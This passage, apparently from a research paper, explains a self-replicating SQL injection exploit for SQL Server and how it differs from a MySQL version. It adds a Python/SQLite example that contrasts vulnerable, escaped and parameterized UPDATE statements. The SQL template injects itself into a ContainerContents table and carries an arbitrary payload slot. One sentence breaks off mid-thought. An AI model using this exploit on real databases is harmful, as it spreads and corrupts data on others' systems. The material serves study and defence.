The SQL Server exploit (Exploit 1) is functionally similar to the MySQL version. The differences are explained below.
    %content%' WHERE TagId='%id%';
    DECLARE @a varchar(1024);
    SET @a='UPDATE ContainerContents SET TagId=''''%id%''''; DECLARE @a varchar(1024); SET @a='''''' + REPLACE(@a, '''''''', '''''''''''') + ''''''; '' + @a; %payload%; --';
    UPDATE ContainerContents SET NewContents='%content%'' WHERE TagId=''%id%''; DECLARE @a varchar(1024); SET @a=''' + REPLACE(@a, '''', '''''') + '''; ' + @a;

Exploit 1 - SQL Server exploit. Whitespace is for readability only.
Like MySQL, SQL Server supports variables. However, on SQL Server variables must be declared before they are used. This happens in the second line. The declaration is also added to the last line, so it is copied to the database. It is also stored in the variable, as this contains the last
MySQL uses a backslash to escape quotes in strings (\'). SQL Server uses two single quotes ('') for this purpose.
MySQL provides built-in functions, QUOTE among them, to concatenate strings and escape the quotes in them. SQL Server does not provide these functions, so the string + operator is used to concatenate strings and the REPLACE function is used to escape them, by replacing each quote with two quotes. This differs slightly from MySQL's QUOTE, as that also encloses the string in quotes. To compensate for this, the quotes are added explicitly.
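As an added example (not code from the paper), the quote-doubling described above next to the two ways an application can build the ContainerContents UPDATE: pasting tag data into the statement text, as the '%content%' and '%id%' placeholders do, versus binding it as a parameter. SQLite stands in for SQL Server because it also escapes a quote inside a string literal by doubling it; the table rows and tag contents are constructed.

```python
import sqlite3

# Constructed stand-in for the ContainerContents table named in the text. SQLite
# is used because, like SQL Server, it escapes a single quote inside a string
# literal by doubling it ('') rather than with MySQL's backslash (\').

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ContainerContents (TagId TEXT PRIMARY KEY, NewContents TEXT)")
    conn.execute("INSERT INTO ContainerContents VALUES ('tag-1', 'empty')")
    return conn

def quote_sqlserver(s):
    """SQL Server style escaping: REPLACE(s, '''', '''''') plus the explicit
    enclosing quotes that MySQL's QUOTE() would have added by itself."""
    return "'" + s.replace("'", "''") + "'"

def update_interpolated(conn, tag_id, content):
    # Vulnerable pattern from the text: tag data pasted straight into the
    # statement. A quote in the data changes the statement instead of
    # being stored, and anything after it is parsed as SQL.
    sql = "UPDATE ContainerContents SET NewContents='%s' WHERE TagId='%s'" % (content, tag_id)
    conn.executescript(sql)  # executescript runs every statement in the string

def update_escaped(conn, tag_id, content):
    # Same construction, but each value passes through quote_sqlserver first,
    # so a quote in the data survives as data.
    sql = "UPDATE ContainerContents SET NewContents=%s WHERE TagId=%s" % (
        quote_sqlserver(content), quote_sqlserver(tag_id))
    conn.executescript(sql)

def update_parameterized(conn, tag_id, content):
    # Preferred form: the driver binds the values; no quoting logic in
    # application code and no way for the data to become statement text.
    conn.execute("UPDATE ContainerContents SET NewContents=? WHERE TagId=?", (content, tag_id))

def read_contents(conn, tag_id):
    row = conn.execute("SELECT NewContents FROM ContainerContents WHERE TagId=?", (tag_id,)).fetchone()
    return row[0] if row else None
```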